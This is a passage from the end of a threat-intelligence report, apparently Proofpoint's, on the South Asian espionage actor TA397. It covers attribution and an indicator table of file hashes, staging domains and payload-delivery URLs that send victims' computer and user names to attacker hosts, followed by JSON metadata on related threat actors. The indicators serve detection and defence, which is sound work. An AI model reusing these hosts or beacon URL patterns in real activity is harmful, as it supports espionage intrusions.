\r\n2025-01-06\r\n16:16:55\r\nIST \r\nFirst seen in Campaign data: 2025-02-03, Staging\r\nURL: /sdf.php?\r\nfv=$env:COMPUTERNAME*$env:USERNAME \r\nottawadesignlab[.]com \r\n2024-\r\n08-25\r\n16:23:26\r\nIST \r\n2024-08-\r\n23\r\n12:23:49\r\nIST \r\n2024-09-27\r\n12:32:13\r\nIST \r\nMentioned as C2 in\r\nhttps://www.ctfiot.com/211062.html\r\nAttribution \r\nAttribution of state-backed espionage activity has always been a challenge. However, by analyzing the confluence of\r\nmultiple signals across various aspects of an actor’s operations, we can make assessments as to the motives and origins of\r\nobserved activity. \r\nTA397 is an espionage-focused threat actor that highly likely operates on behalf of an Indian intelligence organization.\r\nBased on our telemetry, TA397 primarily targets government and defense organizations in Asia and Europe, with a particular\r\nfocus on entities with relations or interests in China, Pakistan, and other neighboring countries on the Indian subcontinent. \r\nMasquerading as foreign offices, embassies, and government entities of Madagascar, Mauritius and more, indicates that\r\nTA397 not only has knowledge of legitimate affairs of those countries, but leverages this knowledge to bolster the\r\nlegitimacy of its spearphishing operations. Moreover, the use of legitimate or spoofed decoy documents, subject lines, and\r\nbody contents pertaining to internal or foreign government affairs demonstrates that TA397 is very familiar with the\r\nstandard practices of government. Having likely legitimate internal documents issued by the Bangladeshi military and tax\r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 14 of 17\n\nauthorities is highly consistent with the assessment that TA397 carries out intelligence-based tasking for Indian state\r\ninterests. \r\nOur observations of hands-on-keyboard activity engagements showed TA397’s responses beginning at 05:27 UTC following\r\nhours of dormant scheduled task beaconing in the first observed case, with follow up activity observed at 05:46 UTC and\r\n08:57 UTC. In the second case, activity began at 10:40 UTC. Modifications on TA397’s server were observed at 11:27 UTC\r\nwith final follow up payload delivery at 13:37 UTC. This aligns with public assessments that TA397 is a threat actor of\r\nSouth Asian origin, if adjusted to Indian Standard Time or similar timezones. However, our analysis of TA397’s sprawling\r\ninfrastructure demonstrates the operational patterns the group follows. There is a clear indication that most infrastructure-related activity occurs during standard business hours in the IST timezone. \r\nAs covered in part two of this blog series with Threatray, there is also overlap of tooling with other known Indian threat\r\nactors, Mysterious Elephant/APT-K-47 and Confucius through the use of ORPCBackdoor. This strongly suggests that\r\nTA397 is part of a tool sharing ecosystem among Indian state-backed actors. However, more research is needed to determine\r\nwhether these groups operate with access to a central “quartermaster” – development resources that are either internal or\r\nexternal to the organizations they belong to. \r\nIndicators  \r\nIndicator  Type  Description \r\nFirst\r\nSeen \r\nmnemautoregsvc[.]com  Domain \r\nStaging\r\ndomain \r\nOctober\r\n2024 \r\njacknwoods[.]com  Domain \r\nStaging\r\ndomain \r\nNovember\r\n2024 \r\n1b67fc55fd050d011d6712ac17315112767cac8bbe059967b70147610933b6c1  SHA256 \r\nLNK\r\nscheduled\r\ntask loader \r\nDecember\r\n2024 \r\n7c5dde52845ecae6c80c70af2200d34ef0e1bc6cbf3ead1197695b91acd22a67  SHA256 \r\nCHM\r\nscheduled\r\ntask loader \r\nDecember\r\n2024 \r\nb56385dc93cc8f317ce499539b0d52aa0b3d8b6a8f9493e1ee7ba01765edd020  SHA256 \r\nLNK\r\nscheduled\r\ntask loader \r\nDecember\r\n2024 \r\nhxxp://46[.]229[.]55[.]63/svch.php?li=%computername%[.][.]%username%  URL \r\nPayload\r\ndelivery \r\nDecember\r\n2024 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 15 of 17\n\nhxxp://95[.]169[.]180[.]122/vbgf.php?mo=%computername%--%username%  URL \r\nPayload\r\ndelivery \r\nDecember\r\n2024 \r\ninizdesignstudio[.]com  Domain \r\nStaging\r\ndomain \r\nDecember\r\n2024 \r\ntrkswqsservice[.]com  Domain \r\nStaging\r\ndomain \r\nJanuary\r\n2025 \r\n80b3a71138c34474725bbb177d8dec078effb7d8f4b19bf2e7a881b01ec7d323  SHA256 \r\nCHM\r\nscheduled\r\ntask loader \r\nJanuary\r\n2025 \r\n55f75724386dbe740c0b868da913af2c8b280335da4fde64e2300c776b79d4e8  SHA256 \r\nCHM\r\nscheduled\r\ntask loader \r\nFebruary\r\n2025 \r\ncdddbd65dbb24d3b9205e417cc267007bfd0369c316f70d2749887b9f02e949b  SHA256 \r\nMSC\r\nscheduled\r\ntask loader \r\nFebrurary\r\n2025 \r\nutizviewstation[.]com  Domain \r\nStaging\r\ndomain \r\nFebruary\r\n2025 \r\n1fbf95ccf1193e84d0e4f8c315816dd2aec56edb11ef1e7b28667360ca7e5ccd  SHA256 \r\nCHM\r\nscheduled\r\ntask loader \r\nMarch\r\n2025 \r\n55f75724386dbe740c0b868da913af2c8b280335da4fde64e2300c776b79d4e8  SHA256 \r\nCHM\r\nscheduled\r\ntask loader \r\nMarch\r\n2025 \r\n5a39f10d2e4c1cae1b52baff0cf8b3e397da2e69cb90e1bac138e8d437cbea41  SHA256  \r\nIQY\r\nscheduled\r\ntask loader \r\nMarch\r\n2025 \r\nblucollinsoutien[.]com  Domain \r\nStaging\r\ndomain \r\nMarch\r\n2025 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 16 of 17\n\nprincecleanit[.]com  Domain \r\nStaging\r\ndomain \r\nMarch\r\n2025 \r\nwoodstocktutors[.]com  Domain \r\nStaging\r\ndomain \r\nApril\r\n2025 \r\nwarsanservices[.]com  Domain \r\nStaging\r\ndomain \r\nApril\r\n2025 \r\nheadntale[.]com  Domain \r\nStaging\r\ndomain \r\nApril\r\n2025 \r\ncc65fac9151fa527bc4b296f699475554ee2510572b8c16d5ef4b472a4cb9ffc  SHA256 \r\nMicrosoft\r\nAccess\r\nDatabase\r\nscheduled\r\ntask loader \r\nApril\r\n2025 \r\n680c99915d478ed8d9f1427b3deb2ebd255a6ec614ad643909ab4c01f52905ae  SHA256 \r\nCHM\r\nscheduled\r\ntask loader \r\nApril\r\n2025 \r\nc9612051b3956ac8722d8be7994634b7c940be07ca26e2fc8d0d5c94db2e4682  SHA256 \r\nCHM\r\nscheduled\r\ntask loader \r\nMay\r\n2025 \r\nSource: https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one" ], "report_names": [ "bitter-end-unraveling-eight-years-espionage-antics-part-one" ], "threat_actors": [ { "id": "655f7d0b-7ea6-4950-b272-969ab7c27a4b", "created_at": "2022-10-27T08:27:13.133291Z", "updated_at": "2026-04-10T02:00:05.315213Z", "deleted_at": null, "main_name": "BITTER", "aliases": [ "T-APT-17" ], "source_name": "MITRE:BITTER", "tools": [ "ZxxZ" ], "source_id": "MITRE", "reports": null }, { "id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4", "created_at": "2025-08-07T02:03:25.123407Z", "updated_at": "2026-04-10T02:00:03.668131Z", "deleted_at": null, "main_name": "ZINC EMERSON", "aliases": [ "Confucius ", "Dropping Elephant ", "EHDevel ", "Manul ", "Monsoon ", "Operation Hangover ", "Patchwork ", "TG-4410 ", "Viceroy Tiger " ], "source_name": "Secureworks:ZINC EMERSON", "tools": [ "Enlighten Infostealer", "Hanove", "Mac OS X KitM Spyware", "Proyecto2", "YTY Backdoor" ], "source_id": "Secureworks", "reports": null }, { "id": "7a8dbc5e-51a8-437a-8540-7dcb1cc110b8", "created_at": "2022-10-25T16:07:23.482856Z", "updated_at": "2026-04-10T02:00:04.627414Z", "deleted_at": null, "main_name": "Confucius", "aliases": [ "G0142" ], "source_name": "ETDA:Confucius", "tools": [ "ApacheStealer", "ByeByeShell", "ChatSpy", "Confucius", "MY24", "Sneepy", "remote-access-c3", "sctrls", "sip_telephone", "swissknife2" ], "source_id": "ETDA", "reports": null }, { "id": "acd789fa-d488-47f3-b9cc-fdb18b1fa375", "created_at": "2023-01-06T13:46:39.332092Z", "updated_at": "2026-04-10T02:00:03.290017Z", "deleted_at": null, "main_name": "HAZY TIGER", "aliases": [ "T-APT-17", "APT-C-08", "Orange Yali", "TA397" ], "source_name": "MISPGALAXY:HAZY TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f5339d7c-473e-4b49-b44c-189b4f72b585", "created_at": "2024-12-28T02:01:54.8259Z", "updated_at": "2026-04-10T02:00:04.778045Z", "deleted_at": null, "main_name": "Mysterious Elephant", "aliases": [ "APT-K-47" ], "source_name": "ETDA:Mysterious Elephant", "tools": [ "ORPCBackdoor" ], "source_id": "ETDA", "reports": null }, { "id": "caf95a6f-2705-4293-9ee1-6b7ed9d9eb4c", "created_at": "2022-10-25T15:50:23.472432Z", "updated_at": "2026-04-10T02:00:05.352882Z", "deleted_at": null, "main_name": "Confucius", "aliases": [ "Confucius", "Confucius APT" ], "source_name": "MITRE:Confucius", "tools": [ "WarzoneRAT" ], "source_id": "MITRE", "reports": null }, { "id": "bf6cb670-bb69-473f-a220-97ac713fd081", "created_at": "2022-10-25T16:07:23.395205Z", "updated_at": "2026-04-10T02:00:04.578924Z", "deleted_at": null, "main_name": "Bitter", "aliases": [ "G1002", "T-APT-17", "TA397" ], "source_name": "ETDA:Bitter", "tools": [ "Artra Downloader", "ArtraDownloader", "Bitter RAT", "BitterRAT", "Dracarys" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434577, "ts_updated_at": 1775792036, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/731646b712fba1e4210f2dd355a839bd4a31b1ec.pdf", "text": "https://archive.orkl.eu/731646b712fba1e4210f2dd355a839bd4a31b1ec.txt", "img": "https://archive.orkl.eu/731646b712fba1e4210f2dd355a839bd4a31b1ec.jpg" } }